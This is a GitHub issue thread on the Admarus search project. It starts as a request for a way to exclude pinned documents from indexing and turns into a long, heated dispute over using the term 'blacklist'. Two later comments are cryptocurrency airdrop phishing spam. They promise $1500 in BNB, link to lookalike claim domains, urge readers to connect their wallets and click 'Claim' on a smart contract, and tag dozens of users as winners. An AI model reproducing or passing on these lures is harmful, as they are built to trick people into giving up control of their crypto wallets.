### ISSUE TITLE
Add blacklist support

### ISSUE THREAD

**Issue by DimitriTimoz** [Mubelotix/admarus#72]
All the documents pinned to our node are automatically indexed on Admarus, but we may need to keep some documents private.

**Comment by jphastings** [comment]
As and when this is considered for implementation, it'd be a good idea to call this a "denylist", "stoplist", "blocklist" or similar, rather than a "blacklist"; it may seem a minor change, but there's harm in perpetuating the idea that black is bad!

**Comment by Mubelotix** [comment]
I do understand your serious concern about this name. I spent some time writing this message hoping it can also be useful for others in the future.

First, I need to give you some background on Admarus. Admarus is made by french people, and is deeply rooted in french culture. Even its name comes from a Gaulish words, the language from our ancestors (which we feel deeply connected to).

In France, the origin of the usage of black/white for allowing and denying access come from a fable from La Fontaine, [Le Loup, la Chèvre et le Chevreau](https://fr.wikipedia.org/wiki/Le_Loup,_la_Ch%C3%A8vre_et_le_Chevreau). It tales the story of a child goat locked in his house while his mother is away. His mother warned him against wolves, which he had to deny access to. The wolf heard the goat's warning, so he attempts to fool the kid by imitating the mother's voice. The kid is smart and asks the wolf to show his paw. If the paw is white, then it's his mother and he will grant her access. If the paw is black, it means it's a wolf, and he will get denied access. The wolf cannot abuse this verification and goes away empty-handed. From this fable, comes the commonly-used french expression "montrer patte blanche" (showing white paw) which is an exact quote. La Fontaine didn't even invent this tale, he only translated it from an older text. I don't know how long this tale has been around, but it's hundreds of years, potentially thousands. It's very deeply rooted in french culture. We teach it to kids in our schools. When we are talking about blacklists and whitelists, everyone thinks about sheep and wolves.

France is light-years ahead america on social issues like racism. People live together in peace, without even noticing the differences in color in our everyday lives. We do not care about skin colors. We rarely even mention it. It's just not relevant.

People coming here to tell me the color black is depicted as bad seems crazy to me (do not take it personally). It seems so far-fetched and wrong to associate the two. Why are people doing this? Does anyone really makes a connection here? It's like telling me that using the word master is bad. In France, students call their teachers master, but it's actually the teacher that serves its students. That's because it has nothing to do with slavery, and nobody ever made the mistake to even imagine one.

Yes, colors have meanings, but these meanings depend on context. Sometimes red means warm but it can also mean danger. Sometimes green means nature but it can also mean toxic. Sometimes yellow means energy but it can also mean caution. It's the same for the black color, it can mean anarchy, night, elegance, revolution, oil, mystery, and so many different things that have nothing to do with each other. Same as other colors, some meanings are "bad" and some are "good" though it's arbitrary. But none of the meanings come to your mind when you see black people in the street right? It's obviously also the same for white (peace, surrender, emptiness, light, etc). 

Remember [Alice in Wonderland, when the queen orders to paint the white roses to red](https://youtu.be/jsW6o4JxTtQ)? Let's not fall in that kind of non-sense. I like blacklist, and as a french I do not like to change what works. I hope this message cleared things up, and if it turns out to not be enough, I might rename it to `liste-noire` so that the gap away from american culture is clearer

PS: Were you the one running a node yesterday? If so, I would love to hear about your experience and the potential issues you encountered at [mubelotix@gmail.com](mailto:mubelotix@gmail.com)

**Comment by jphastings** [comment]
Thank you for taking the time to write such a detailed response! I understand your views here, I also come from a place that is more accepting than many — you're absolutely right that all things have their context, I offered my suggestion as a small act for the engineers living and working in the many _not_ so lucky contexts.

My personal preference here was to suggest the change, as (for me) it would have been of no consequence, but may be beneficial for others — but I respect that your culture's weightings of cost to yourself and benefit to others may be very different!

One totally separate reason that might make `denyList` a smart choice here would be that the IPFS team [made that swap](https://github.com/ipfs/team-mgmt/blob/d8b8c40277510fe327f346385ded0b77c50ca009/meeting-notes/2019/Q3/2019-08-05--core-implementations-weekly.md?plain=1#L166C56-L166C107) a few years ago in their own codebases.

That aside (and having come back from a weekend hiking), indeed I was running an Admarus node! I'm keen on running one permanently, and I'd be happy to share my experience, I'll keep that in a separate issue though so as not to take this too far off topic!

**Comment by Mubelotix** [comment]
Yes, there is probably a more appropriate naming in this case as it's about indexing, not restricting access. In this case, I was thinking about `ignored-cids`, `no-index-list` or something like that. But the day will come when blacklist is appropriate, so it's better to have this conversation before it happens

**Comment by Mubelotix** [comment]
Hi Fabrice,

I agree with you that France *has* racism issues. Also yes, slavery and colonies were used in France too, not too long ago. I don't think there is much to add to what you said, the "light-years ahead" is obviously a bit of an exaggeration indeed. Still, we are ahead (right?).

People who know me will agree with you that I have an idyllic vision of things. I see things as they should be, and I'll fight their current state until they become what they should be.

The rest of your message isn't relevant to me, because you did exactly what I said people should avoid doing: you drew a connection between the word "blacklist" and black people. This should never happen. This is a mistake and this leads to chaos in your mind. There is no fucking connection between human skin color and the concept of blacklists. I'm sure you already understood that from my first message, but you chose to disregard it (maybe because you disagreed?). The problem is not the word, it's people's vision of the word. Of course, it would be so much easier for me to remove the word, but it's people's vision of it that needs to be fixed

I'm astonished the discussion is going so off-topic. Of course "Black Lives Matter". Of course "All Lives Matter". Of course "BLM as much as white ones". None of those are bullshit. I'm sad to see people jumping to such conclusions and doubts. I'm trying my best at being open and justifying the choices made here, just to see people use my efforts for the opposite. Maybe I should never have commented on this. The term isn't even anywhere in the codebase, how absurd is all this? Imagine waiting the entire day while doing the things you must do, only to realize that instead of using your free time for useful things like implementing new features on Admarus, you need to spend it writing such boring comment on github

I'm sorry and I won't lie to you: you didn't change my mind. The only thing that would change my mind is if the word actually comes from something evil and was invented for racist purposes. Since I'm pretty sure it's a fairly innocent word coming from a completely unrelated source, I just don't think it's right removing it. I'm particularly sad to see people misunderstood what I tried explaining. If anyone is now convinced I'm some unsympathetic conservative, then let it be. I wouldn't be here if I wasn't the opposite to be honest, but it doesn't really matter. The project is what matters, and the project goes on.

**Comment by fabricedesre** [comment]
> you drew a connection between the word "blacklist" and black people.

Believe me, I didn't drew that connection. Black people did, and pushed for change in places it was used (same for the master/slave terminology). I just accept that even if I can't personally relate to that, I can show empathy with them and stop using these terms.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by ryanpitts1** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @nedimf, @cxpolive, @gipyeong-lee, @mrutkowski-rcd, @mukul7966, @csmith131314, @Dafeesh, @giabao, @andrewtian, @mojo4044, @Crataven, @ka13ar, @markhv-code, @lng-sil, @fet4lx, @HenryBlaq, @hnsylitao, @slim0918, @JulienMora, @klarkc, @PrawiraGenestonlia, @benyaminbeyzaie, @chiefeasy, @amoghrajesh, @Clackz, @TimeCracker, @DonDavide97, @usetools, @musaoc, @EverythingWillBeCode, @Sandesh1013, @0x49D1, @efaurie, @FullCustom, @yqzzj, @dianjuar, @Mroblez, @vhald, @VITAL1E, @Dhruv-194, @IndianBoyBR, @michackcanive, @Kadynm49, @nol13, @SeyyedKhandon, @Udmx, @dongsub-joung, @songbingyu, @pherefordATK, @heyehao2008

**Comment by Dafeesh** [comment]
@fabricedesre 
> > you drew a connection between the word "blacklist" and black people.
> 
> Believe me, I didn't drew that connection. Black people did, and pushed for change in places it was used (same for the master/slave terminology). I just accept that even if I can't personally relate to that, I can show empathy with them and stop using these terms.

Correct, you didn't draw the connection, thus you have no right to impose that belief on others. You're not being empathetic, you're being a thoughtless zealot.

Blacklist stems from black ink which infers opaque. 
Whitelist stems from the lack of ink which infers transparent.

These terms were never used racially.

And that's not even to get into the master/slave argument... To assume that only black people have been enslaved shows an immense lack of knowledge about history.
